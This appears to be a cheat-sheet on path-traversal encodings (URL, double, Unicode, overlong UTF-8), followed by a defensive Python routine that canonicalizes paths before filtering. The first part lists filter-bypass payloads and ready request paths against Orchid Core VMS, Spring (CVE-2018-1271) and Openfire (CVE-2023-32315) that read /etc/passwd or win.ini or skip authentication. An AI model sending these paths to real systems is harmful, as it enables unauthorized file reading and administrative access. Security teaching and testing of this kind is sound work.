Methodology
We can use the .. characters to access the parent directory. The following strings are several encodings of that sequence that can help you bypass a poorly implemented filter.
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
URL Encoding
| Character | Encoded |
|---|---|
| . | %2e |
| / | %2f |
| \ | %5c |
Example: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
Double URL Encoding
Double URL encoding is the process of applying URL encoding twice to a string. In URL encoding, special characters are replaced with a % followed by their hexadecimal ASCII value. Double encoding repeats this process on the already encoded string.
| Character | Encoded |
|---|---|
| . | %252e |
| / | %252f |
| \ | %255c |
Example: Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)
{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
Unicode Encoding
| Character | Encoded |
|---|---|
| . | %u002e |
| / | %u2215 |
| \ | %u2216 |
Example: Openfire Administration Console - Authentication Bypass (CVE-2023-32315)
{{BaseURL}}/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
Overlong UTF-8 Unicode Encoding
The UTF-8 standard mandates that each codepoint is encoded using the minimum number of bytes necessary to represent its significant bits. Any encoding that uses more bytes than required is referred to as "overlong" and is considered invalid under the UTF-8 specification. This rule ensures a one-to-one mapping between codepoints and their valid encodings, guaranteeing that each codepoint has a single, unique representation.
| Character | Encoded |
|---|---|
| . | %c0%ae, %c0%2e, %e0%40%ae |
| / | %c0%af, %c0%2f, %e0%80%af |
| \ | %c0%5c, %c0%80%5c |
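
Seen from the filter's side, the encodings above are handled by canonicalizing before checking. The following is an added example, not code from the original page or from any of the products named on it: it undoes %XX and %uXXXX layers until the value is stable, rejects byte sequences that are not strict UTF-8 (which covers the overlong forms), and only then looks for a `..` path segment. The names `naive_blocks`, `canonicalize`, `classify` and the `MAX_ROUNDS` limit are assumptions made for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Code points from the page's payload list that some back ends fold to ASCII.
LOOKALIKES = str.maketrans({"\uff0e": ".", "\u2215": "/", "\u2216": "\\"})
PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")
MAX_ROUNDS = 5  # assumption: more nested encoding layers than this is rejected


def naive_blocks(raw: str) -> bool:
    """The weak filter: looks for literal dot-dot-slash in the raw value only."""
    return "../" in raw or "..\\" in raw


def canonicalize(raw: str) -> str:
    """Undo %uXXXX and %XX layers until the value stops changing.

    Raises ValueError on overlong/invalid UTF-8 (UnicodeError is a ValueError
    subclass) or when the value is still changing after MAX_ROUNDS.
    """
    value = raw
    for _ in range(MAX_ROUNDS):
        step = PCT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
        step = unquote_to_bytes(step).decode("utf-8")  # strict: no overlong forms
        if step == value:
            return value.translate(LOOKALIKES)
        value = step
    raise ValueError("too many encoding layers")


def classify(raw: str) -> str:
    """Return 'ok', 'traversal' or 'reject-encoding' for a request path."""
    try:
        path = canonicalize(raw)
    except ValueError:
        return "reject-encoding"
    return "traversal" if ".." in re.split(r"[/\\]", path) else "ok"


if __name__ == "__main__":
    samples = ["../", "%2e%2e%2f", "%252e%252e%252f", "%c0%ae%c0%ae%c0%af",
               "%uff0e%uff0e%u2215", "/static/css/site.css"]  # last one constructed
    for s in samples:
        print(f"{s!r:28} naive_blocks={naive_blocks(s)!s:5} -> {classify(s)}")
```

The result is only meaningful when the canonical value returned here is the same value that later reaches the file API; checking one form and opening another reintroduces the gap.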